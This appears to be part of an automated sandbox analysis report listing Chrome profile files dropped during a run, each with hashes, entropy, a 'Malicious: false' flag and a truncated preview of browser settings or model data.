Preview:	{"expect_ct":[],"sts":[{"expiry":1671570703.904414,"host":"LAZkYS46RVRcFiZAzmUJrz6TJHBd4nwE6VxPWfPLYHs=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660684303.904418},{"expiry":1692221736.020158,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685736.020162},{"expiry":1692840214.461557,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661304214.461562},{"expiry":1671572135.853791,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660685735.853795},{"expiry":1692221735.789992,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660685735.789996},{"expiry":1671570625.412231,"host":"2lkpJCeDA/iPFazSWca3N4hZCz/cVnuSdphlO2veD4Q=","mode":"force-https","sts_include_subdomains":true,"sts_obs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\faa73903-10d5-40f8-af87-08b4f0c5988f.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	8040
Entropy (8bit):	4.877997906949624
Encrypted:	false
SSDEEP:	192:MY9+y42bU6VB0DqpTIenVUM8vKShAhRRHItWN6T8QZGmZDrCXJxChIa/hSuF7UHZ:MY9+y4+U6VB0+pTIenVUM8vKShAhRRHb
MD5:	8566F0CACA5ABFD93F3AB7232750158B
SHA1:	061D0D8B7738696B33A94C166BAF0D7702805ED9
SHA-256:	2DAD3A357F85CE3B1D3EFDE71505891C65657296369F8608F42974304C919B67
SHA-512:	C3AB8B56F5430D94DD648FAC94160DD8EBF94C8AC33E6A880E299014C7BFC64B12F131F5548AC7A8BA88F6492E32E775A895EE1D5916C6665FFB363623392BA7
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346272015","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19532},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751350900812","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22541},"server":"https://update.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751345916701","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":18229},"server":"https://ssl.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307751346408449","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19802},"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiratio

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9590
Entropy (8bit):	5.153417695846032
Encrypted:	false
SSDEEP:	192:YXK1XcPY88yy+F3p7YXkmGkjd/mbdplKiWQbDYpqn0ttjEsXtSct:YQXyx36hrZAYtIsXtSct
MD5:	4C2561E27937D64435D0935C9A44228B
SHA1:	677D5137B5F54962A96B693C9690AAC17BE1F793
SHA-256:	2A519680B3ADB32BD1AF83BB7A91832C2FC1F2F1CEFBD50C92DD9406B47FB951
SHA-512:	C0086D1071F8D1EB4E2C5747D2F20080266122FDE11D17D2573EB405BF03FCC1EDE2D1D90F4C8B3E2201D0EB09901283D2C6A8C9BBE0A5BBDA2E863878925844
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305777805843938","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777805837954"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	14764
Entropy (8bit):	5.568086358361862
Encrypted:	false
SSDEEP:	384:27WLlyXK1kXqKf/pUZNCgVLH2HftsrUKQu4LT:lLlgK1kXqKf/pUZNCgVLH2HfWrU1uo
MD5:	4FD062FB71F957F76295FA9357004CA2
SHA1:	D643FA2478026469D20FA2831B626517D337556A
SHA-256:	5D99EC5C3EE3882DFA83FB6C7EEDA9B68222D9CCE7FA351CC783587EF67DD619
SHA-512:	ADE878E6AEF3A8C205CF287FEC7F8FC096920E5A0512B5E2A292C8140DB2955821F3B4D7E2603FFC4BB52D76723595A42970B5E1A28E72D09C0EC36BCBB9C8BC
Malicious:	false
Reputation:	unknown
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13305777803586872","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"web

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Trusted Vault (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.923181998146335
Encrypted:	false
SSDEEP:	3:ZJWVZ21dn:ez21dn
MD5:	431826CE41F9B77C3714D55F1F1090BC
SHA1:	ADF6C3D4F692CC74E4CB76476E0BD50A7BD70733
SHA-256:	7245354DA9DD0F13FC8AFA823CE4CC452148E57E3BCEE060E2DE91F75160CB7D
SHA-512:	4043272FCDAA831F059038A11211BF7CBC8CCD7435430B4F57157F63107BA384BB1E25B6DEFE3ECC2C581EA44970668A7FF0FCA2B6A1E8CDCD32A29AC59F4154
Malicious:	false
Reputation:	unknown
Preview:	v10^kM..9;g.c,..,..{.......S...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a86d9f9c-fe9e-45d9-aed9-0d43f7756896.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	14764
Entropy (8bit):	5.568086358361862
Encrypted:	false
SSDEEP:	384:27WLlyXK1kXqKf/pUZNCgVLH2HftsrUKQu4LT:lLlgK1kXqKf/pUZNCgVLH2HfWrU1uo
MD5:	4FD062FB71F957F76295FA9357004CA2
SHA1:	D643FA2478026469D20FA2831B626517D337556A
SHA-256:	5D99EC5C3EE3882DFA83FB6C7EEDA9B68222D9CCE7FA351CC783587EF67DD619
SHA-512:	ADE878E6AEF3A8C205CF287FEC7F8FC096920E5A0512B5E2A292C8140DB2955821F3B4D7E2603FFC4BB52D76723595A42970B5E1A28E72D09C0EC36BCBB9C8BC
Malicious:	false
Reputation:	unknown
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13305777803586872","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"web

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f3af61a5-892b-4b2e-be8b-4b789f058c3f.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	9590
Entropy (8bit):	5.153417695846032
Encrypted:	false
SSDEEP:	192:YXK1XcPY88yy+F3p7YXkmGkjd/mbdplKiWQbDYpqn0ttjEsXtSct:YQXyx36hrZAYtIsXtSct
MD5:	4C2561E27937D64435D0935C9A44228B
SHA1:	677D5137B5F54962A96B693C9690AAC17BE1F793
SHA-256:	2A519680B3ADB32BD1AF83BB7A91832C2FC1F2F1CEFBD50C92DD9406B47FB951
SHA-512:	C0086D1071F8D1EB4E2C5747D2F20080266122FDE11D17D2573EB405BF03FCC1EDE2D1D90F4C8B3E2201D0EB09901283D2C6A8C9BBE0A5BBDA2E863878925844
Malicious:	false
Reputation:	unknown
Preview:	{"NewTabPage":{"PrevNavigationTime":"13305159344550546"},"account_tracker_service_last_update":"13305777805843938","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777805837954"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\077edcd2-3c01-42a3-bfd7-4840c42d07e2\model.tflite (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	27244
Entropy (8bit):	3.8842802707357547
Encrypted:	false
SSDEEP:	768:fUhIi/t/ZHNb6uqTKDW+y15z+3XBvd/JoL34F8CC6IYYr1lNKnTHa5xNSM+6O/gd:iIilRtb6uqTKDW+y15z+nBvd/JoL34Fw
MD5:	89932ADF9CC14986CA58687A6FAD996D
SHA1:	0F96CBF80B1D7AE823A4A78C44CE61ACD2020BE9
SHA-256:	68E66131713862F4418E14512883753CA275304E971A078D907C463F295194B9
SHA-512:	5C5E0AD32D94886D3E73544676FC8BC90694922CA5E11B82A6E63D1F02F0626642D2B8B0A1B7C72FAC1ED8DFFD63DBCB26185708A59950BC4077F489CD624DB6
Malicious:	false
Reputation:	unknown
Preview:	....TFL3.. ..........................................i..........................<.......serving_default.........`...............output_0........................inputs......,.......................CONVERSION_METADATA................min_runtime_version..... ...................................p...\...H...4... ...................................l...X...D...0.......................................t...l...d...\...T...L...D...<...4...,...$...................................................................................\|...t...l...d...\...T...L...D...<...4...,...$...................................................................................\|...t...l...d...\...T...L...D...<...4...,...$...................................................................................\|...t...l...d...\...T...L...D...<...4...,...$...................................................t...`...L...8...$...................................p...\...H...4... ...................................l...X...D...0...........

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\89e53782-7708-49f7-a47c-39f8a8088454\global-entities_metadata (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	29747719
Entropy (8bit):	7.553089146596958
Encrypted:	false
SSDEEP:	393216:Aiq7Mc1oteqlInpBOzSUd20vf2yUjsPdIWhQ8GeoqxcjFXuFat2WnmrRJE:AL7RokZBOzHd2r5sPiW5ogcjkFavqjE
MD5:	4A5251EF82B401065C18CF9ABFA28F46
SHA1:	38919DCB91872F95BCA242779BD0D1A857AD512F
SHA-256:	379EA3CBD805228A25A4645E3B7500B54FB0ED51342674A704F08EA22E86C1BB
SHA-512:	9E3DA5F7EC8917F8F8E305B8E17D5B39CE800D2E5328EF244D647B27DF2FCF28E0711ED0242C73B00D21EB6A346A391CDA5C8AA3191B49D217EE0C3215DC5F7B
Malicious:	false
Reputation:	unknown
Preview:	. .i............. Los Angeles County Museum of Art...49+..BC. Z?.4.....f].z...qF....w....9i...[.M.....s......b.....j..................Z\|?....?........A\|.....%.S^S..$.........z.........E..(......<.{.. .......h.. ......@Lf..,.i....?.fff?......%...].....+....@..Air freshener..f........6.6...Date Ariane..:. .A..Z.Z.V..F..6..8._.R..z...v...52....9<....6...".......W'..$.........U.#...K..,n..$.........5.(........5.}.&.....2....I%Visual design elements and principles. }^.z...xf...=.>4...==.p1.O_.......O..F....%..e...~Q......d.....+.l?.33s?........@.[{.6.....9%4...Makar Sankranti.... ><.r..9..A.[L..%.._........r..$.........s..$.....3..~I(....8...8.#.....m)C..Ajiaco..@. .Q`...}6.Ix.\|L~.AJ.c..T......z......)..IZ.c.t.......r..$.....4.d$w9( ........p.% ........s.$.....-.3.u($......@.r..H .......t.H......"!q...Xiumin..$H)..#J6. .[....m\....].qf.6.g.nI.\...Yr.. ...b........k...4.z....(..c...$........P..(......../.... ....K...(..(........Q.........A.4..Ray Sahetapyv........40.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\89e53782-7708-49f7-a47c-39f8a8088454\global-entities_names (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Applesoft BASIC program data, first line number 9
Category:	dropped
Size (bytes):	26510576
Entropy (8bit):	6.945059200432203
Encrypted:	false
SSDEEP:	196608:rGivLHpQn5wcHmIHfkK0nNG78ig/U3YkWM2WY4aBsWraubKnsjWeMjO/l7Ju:rG6LcLHm/ngOM2dqzWKniWPsu
MD5:	07CD1F4E37FDF896D45F6308E679D6D3
SHA1:	BF4C0D90D1A02468F5095F7BD144781434DC6C73
SHA-256:	483A454B9A0E2F35B988BDF28C553CEA4A525695E1274868A0CBF15F08FE6FC8
SHA-512:	A34C4DBCAB8F2CE42F9415AE1695D601660981BD0708EF31A1F49799D48E07785E3C17CB87D0360FBE2994CA1E13A78683B53CE77D5538B28A70CAEE4F038B52
Malicious:	false
Reputation:	unknown
Preview:	............ ....(8...!~.uv... ......(;...2ht.jC.. ....("...b..de... ....(c...p...*... ...(p...sa .$... .......(....x`..._.. .....(7...\|..[Q... ..-(=....X..\... .....(S.....D..... .......(,........... ....(0....Qic\|f.. ......(L....E.7.... ....(>........... .......(w........... ....(N....l..... ...(i......z._.... ....(\....pH..... ...%(L....n.Swr.. .......(R....i..AB.. ......(......gqGeQ.. .......(h.....[%Z+.. .....(K.......... ....(K.....W... ......(Z....e"..... ....(6....9.().. ..4(\.....6.6u.. ....(@...#M.C.... ......(?...&..@&V.. ....(7......{f.. .....(\|...(.,n}p.. ....(`...6....S.. .....(0.....7s.."... ...(z...=..... ......(<...X/.{E... ....(U...iR./.9.. .......(A...m'.n2... .......(K...{"z.<Z.. ....(9....BIOQ... ...(`....F5.... ..2(H.......)... ....(/......0.b.. .....(r....W.... .......(7.....5.E.. ....(u....3D.... ....#(Q....DI.Z.. ....(z....+.uP... .....(H......... ....(X......O.S.n.. ....(7....z.(P.. ....\|(%.....4..1... .......(b..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\89e53782-7708-49f7-a47c-39f8a8088454\global-entities_names_filter (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	830721
Entropy (8bit):	7.450847459983356
Encrypted:	false
SSDEEP:	24576:+F/VsiP4eEOWMwIBOyqFJ8TBwy0zktBKMXDWZu:oV6eJBmFJGBFhSu
MD5:	8499188718D6C9173DEE32B234CA5C3E
SHA1:	12176AFFCAF756D85AB964C4766E91FF191B18EB
SHA-256:	BD4718F4CB57F283E79560D4D0F2BF7C912145BF4AFF65C99DD27B5BEBBA0D04
SHA-512:	D1A25EF9DE6113B8EC682061FA629473B86AD04A1AC901CB365C075EBB206D15301CEA26E599D007F4A5177EAD2FA8120E97D67A6DFA16D4EFFFEF3B6A190AB0
Malicious:	false
Reputation:	unknown
Preview:	....@(a.Hx.O....T$..?c5P 0R`CA..J. .0.. s.@...$.....D.@.`.(..#D...b.@.."_$(.@.!1j_........p.zL..dQ...PT.2.S..`..,...@.../..!.S..50.!..!.X..A?...@+.Hr.dW..%$.,...."...(....`..%!.P.\|n@S....@.........9 Hs......F........0.qx....V...0T..!..P.7`!.x.!q.@...<..-"HJ.Pd`.h.0..-..W.`.@.j.A`...."vR.l..t`G.<..C.c.b.@.0..(q..4....Q..A)...@D@......U..LJ@.!..2@..%9..$.H....UNC).(B..j.c....J........\|...3......dB0.9.H..DFd.".pP..... ....'.......k@@A...!T.h.".HPp.b.....V@@O.\|D....!5]....,..D)..'...".... .W.Aq.....\|.@. @.MP.T0...0...A.a...pR..X`..P....... ..I...HN..!./.p.....J..4.......q..c.I.. .r8X..a.........C....hs5... $.Q..V$x.JP.[i....e....Ah....@.@.!#.4N...K....@0..H.4I0..xH.z8..........L.9..C@....$.r......,.. .y0.`.........$l.......@x..).c")..U.l.@CP... ...g.!....p+."@...p.x..`g.4.0F.0N....BHdd@ ..."0...Q2.b.@H.$..8..Gp.$.V x%DThEB...I.8..K....W..`i.Y I.....B..4.YIgJ..6c..B...D.e"Fe."(. r......`....PC.K.P.2.@h.A...Lb`.........P"..@...4..SH...e...(.....g..E....$-B:.FQH..c.}.^.@.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\89e53782-7708-49f7-a47c-39f8a8088454\global-entities_prefixes_filter (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	232904
Entropy (8bit):	7.557578420892044
Encrypted:	false
SSDEEP:	6144:WQr6kjXfX5w0PznLILqQce7hGpuMOkqTjViv6BYNwEFWML:WS1XxwSQYqDKNxF1
MD5:	00E11BEA8605B30D9B333531C53D3E75
SHA1:	E9B5596AFE1CE6B9D48F6873DF73904245A62190
SHA-256:	BB1837C8878F22469FE37632D964C7BAFC074661077A0AA3D2BF7DDB2A2F6C30
SHA-512:	9FCDA1AC533DF7B159E3B2C8B3E98969B8D6160DF127C82675FB2A0FD14E170CBDD80891D32B6D57054CF00C7CAC3D3F9F807C6EE73E683B1BB8AAFC4077111A
Malicious:	false
Reputation:	unknown
Preview:	......4.-0......A..@..H..A..^..,!R...U....HP...... E...iS ......Hf.f..d....;..;;........h.#2..@...$1....... D.Dp......&....UXT...(.mP.B..rBN.#..{......z...Q5...A..fw.67s?qsc.C.. ..B #@.P2...&...% gB(......j..B!. . ...$C.........) ......P...."..8Cf...E......~.w...Apt..P@...1d4..e.@0. U.b.g..0.8.3...Y..8.t...... A.e\...B.aD....U..1..!..}.........%c.:......^.......C...@..:..+...E...i.0(..A@.vq.8.!..E#.uG.O.....X.W....1.`..s......E.f0a....l..=.$.B.......N.....C.. ..........."...v. J.)ad/.....N...H.1.Lb".'vw.uv.g.7.S...........c......d...Tp..m....y.H......fCp....TP....=@. ...@..X..A..u8#\|........M~.&...K]......$.......].4.....Ok..`..@0$.D..x@..@d..."..CbMp!(`....D.;0$P ............._..!.T..,"..".....)....GC......TpJ.C.0T.."2..7......$..I..f...2.p..).l.J..0..............p`. m..9....@...p. Cp..x'D.)..........~..... ..dD.L.b.)=.z@..$a.@e..&hw..fwc.w.{3..qfT,R,....%.T.(L .#...4.8....TS..>.n... ..w.)....BLp. `.......A.N@(C.XA".............f.FpC"[.X.. h........"..F.....h.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\89e53782-7708-49f7-a47c-39f8a8088454\model.tflite (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	410376
Entropy (8bit):	7.178086442654218
Encrypted:	false
SSDEEP:	6144:j4Ym8gmGjPFQAywKthp8kyRNjfEJ39S5XSqwbquUIZOGhgWWnAtM9:0oGbFQAyIRdQ6CqweuUih164M9
MD5:	FBC9347A6B3346474EA54E3D597F0E61
SHA1:	CE88F31D16225EFC8F98B36C838BD09372053904
SHA-256:	39D421B174E1F5E7C241628D11CC07BC3E2D50A750A61B2F35582A8FFB65482B
SHA-512:	56A26AEAD2439E8D8008F661A1CC8A27C147A0E9D1846044CE8A7DEDC371D3AE2286EFD4E038AFBBA829BC19BB4D92A8457D5F05C10F44D5750B3B1D7E59642D
Malicious:	false
Reputation:	unknown
Preview:	....TFL3.. .............................t...4...D...(A..............4.......................CONVERSION_METADATA.........................min_runtime_version.....................................\|...t......T......4.........................l...P...4...........x.......r..Hr..8b...a...Q...Q...@..h@..X0.../......(...........x...h...........8...(..................X...H................z..xy..hi...h...X..8X..(H...G...7...6...&..X&..H...................x...h...X...........(...........x.........H...8........p...p..._..._...W...W..dW..HW..(W...W...V...V...V...V..\|V..\V..DV..(V...V...U...U...U...E...E...E..lE..XE..H5..(5...5...4...$......................x...h...X...H...8...(t...d...T...C...3...#......................x...h...T..............\|...`...D...,.............@.............<...................l......L.......,...........\|......\......<...................l......L.......,...........\|......\......<...................l......L.......,...........\|......\......<...................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\89e53782-7708-49f7-a47c-39f8a8088454\model_metadata.pb (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	2792
Entropy (8bit):	5.0622742873807205
Encrypted:	false
SSDEEP:	48:oH38zzAzeUnVRlCp+S6NqUTwcxlmErwwy11AYcrbI2:oH3yAqUnvlCQfNqU/211X2
MD5:	CB144D21AE33C33A1192CAD6223A1076
SHA1:	A7AECDCA8C8687A4C73362000B5B06A5038057DC
SHA-256:	074C82B74B3999119AC2321A1ECB933946DA95AD72D2CBF73B71003CEF93F1F1
SHA-512:	E6EC4BBBBC8648AA6BEF90BBC2FE988A7E187D40D9A8C709B4655909FFA61C11B9343382B4F87938DB78F7CB233AF0EAD608B8717C30278DA45E710F95220DF2
Malicious:	false
Reputation:	unknown
Preview:	......0.H.P.X..."...../collection/accommodations"...../collection/actors"...../collection/airports"%...!/collection/anatomical_structures"...../collection/artworks"...../collection/athletes"...../collection/authors"...../collection/book_editions"#..../collection/business_operations"...../collection/cars"...../collection/causes_of_death"8...4/collection/celestial_object_with_coordinate_systems""..../collection/chemical_compounds"!..../collection/consumer_products"..=../collection/countries"..>../collection/cuisines"!..../collection/culinary_measures"...../collection/currencies"...../collection/diets"-...)/collection/disease_or_medical_conditions"(.?.$/collection/educational_institutions"...../collection/employers"...../collection/events"$... /collection/fictional_characters"...../collection/film_actors"%...!/collection/film_screening_venues"...../collection/film_series"...../collection/films"..@../collection/foods"...../collection/garments"".A../collection/geo/business_chain"!.B../colle

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\89e53782-7708-49f7-a47c-39f8a8088454\word_embeddings (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	1149370
Entropy (8bit):	6.989299810768632
Encrypted:	false
SSDEEP:	24576:lyct25h2qYEYfvGjCx8/U6co9bkDhUqPtRxM8Z9cWALISy8B:45h2hLv0CKU0kDPVLZ9cWzSbB
MD5:	8F10D6BCB0B9AD4DF0EA6C046C89B710
SHA1:	EAAC7DFC9EC6E5CDE1A96929AC7E1BD8A3B48E69
SHA-256:	3240EF3FDCA04A5FFC52E7429EBFD8D0227C37F6BE62DF230F25D65EC9AABB19
SHA-512:	1575937679E90E444B29EA258A84E4CF31B0E12BA9426DF8AC34C28FC49F1D9EDC77D684E3937646807D668BD2E68FFEB21342B056B8E36FE992F4F2A715B9C4
Malicious:	false
Reputation:	unknown
Preview:	.. ....v..r....f...w..f..jpk.m.tu..}.}Z.. ...x.O.`yyzx.t._..\|s~..y..x..oozu.^.. .y.O_.t..^h....k...bW..x}yS.Rs..{.z.. .\..w.....hx...c.y.a..e.l....cu~.... ...kk...x.....z{.j..w..~...ln~.nw{s.. .y.a.nn[Mp.k.zj.......ihxk{q...@k.... ..Lm.toz``y}.Ysr..~..g.i~._...hr.:.. .e.k{x..Xe.f....dwn..\|...g.e..^ae{X.. .".a2kR.a\|nH.F.^kT.j....c.../....qI.. w.qu.w.v......y.qY....ow..mWjs}u.r.. ...\|.b.\|.xtX.\|.m{UUY..f..h.\|.vh`\.v.. .......y]x..}.y...^....d..k..wmx..... ...u}}...uz..[.j\e]..g~.G..i.qI.z.^.. o..n{.jK....Xe..b~.gz.Xd.ev...o..... ..bP.p..Nngg..Zvvq..zZ.O_}.i....Z[.. &..p....w.e}.qYn.}.[}nceovV.d...q.... .'0....bp...qe..JM\|.\|lp.}~..p.h...X... 1WJ.j...~l.....ht.h....~.....js..{d.. 3/q\|}.X.....f..A.[....hsU.`J_r[.h[... 57.....u..b.{iysKqw..wn.i..r~..z.R... :....v.g....\|yW..w.{..fxi\|d.....`t... ;.Vq_n.}.u.\|m..iX.o.j.mno_...ro...... =^tm.~.....t\...r.Uo.}tsuZu......m~.. B.R~a.i^Z....zp...i.o..i...{z..r}v... D.-..Z.iq...Uze...apg6`.jWA..rj...... Fk..{ndV...SO.ih._.t....ye..qt...Yx.. H.>.ueWp.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\9d644b23-dda4-43a6-ab64-d0feb0d142e0\model.tflite (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	13924
Entropy (8bit):	4.524411316778424
Encrypted:	false
SSDEEP:	96:6ZuzUpYY9WW1H9xjMqvo0zjCOgxcyR7dCMUdvRWqIC2s8vvcr17/eFt9n9nFWB5A:JQEWh9x7ghb4r7pi4nBf+
MD5:	DD91CF850364320FA627573BEAAA8BDE
SHA1:	05F312EB672A32EF95ADEFC51A0BDC688C4B71AA
SHA-256:	CA54E4D1D1AE7932CE97FEDE0717956905BD9E796779ACC4C1A0BA75737F91AC
SHA-512:	B65A5D07646FDE821BE8A281002C2DB233E40184CF2E397443D5D659BE25679F5370AFD3C32D594FD828EBB37799147522357C40167711BC27C26E71CE066104
Malicious:	false
Reputation:	unknown
Preview:	....TFL3.. .............................t...@...P...$5..............4...........N...........CONVERSION_METADATA.............M...........min_runtime_version.O...........................................x...p...h...P...<...(...................................t...`...L...8...$...............................................................x...p...h...`...X...P...H...@...8...0...(... ...................................................................................x...X.......N.......D............... ...............................................2.11.0..............1.14.0.............................................................................................................................................................. ...$...(...,...0...4...8...<...n............d3?...=..............Z=.x.>...............<............................b$.?..............k...............5?..............X?............'5.?..............j.............6.5?&...........N.X?6...............F...........0..>V...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f7b4f399-1082-4c6e-89dd-1dc235c6c30f\model.tflite (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	392048
Entropy (8bit):	5.826576770481211
Encrypted:	false
SSDEEP:	6144:4i8mNiZGi+jiwubrNEOB37+rNiyykvXpqQC7SaPGNFzq/RnfAmn+qGk07U0z9zMl:WqEGi+GwGrNv9+r8bkvXpqQMLuNy5YmJ
MD5:	6D7C2F9E94664539DEC99B3233301B01
SHA1:	85812B004742CC1C211C92911131CE270F8BA769
SHA-256:	A0956386DC64FD9F4883C8741F950CD60A56859616B159C9E4251C9EB0AC5534
SHA-512:	4D06917F30651C3BF13C509AAE79793B3F1EC93DE12179464B18FD9FD16C7BF466884B1C70E425D7E937ADDE341CF24BD08F19A132BBB9683E804F29B4ED0C33
Malicious:	false
Reputation:	unknown
